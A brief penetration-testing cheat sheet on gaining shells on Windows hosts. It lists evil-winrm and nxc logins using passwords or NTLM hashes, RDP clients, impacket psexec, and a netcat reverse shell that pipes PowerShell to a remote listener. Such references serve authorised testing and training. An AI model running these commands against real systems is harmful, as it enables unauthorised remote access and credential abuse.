🐚Shells

Evil-WinRM

nxc winrm -i IP/hostname -u $USERNAME -p $PASSWORD/-H $LM_HASH

evil-winrm -i IP/hostname -u $USERNAME -H $HASH

evil-winrm -i IP/hostname -u $USERNAME -p $PASSWORD

freerdp /u:$user /p:$password /v:$ip

remmina -c rdp://$user@$ip

PSEXEC like functionality example using RemComSvc

impacket-psexec '$user:$password@$ip'
psexec.py $user:$pass@$ip

# Windows
# server : 
nc.exe $ip $port -e powershell

# client : 
nc -lvnp $port

Last updated 2 years ago

Was this helpful?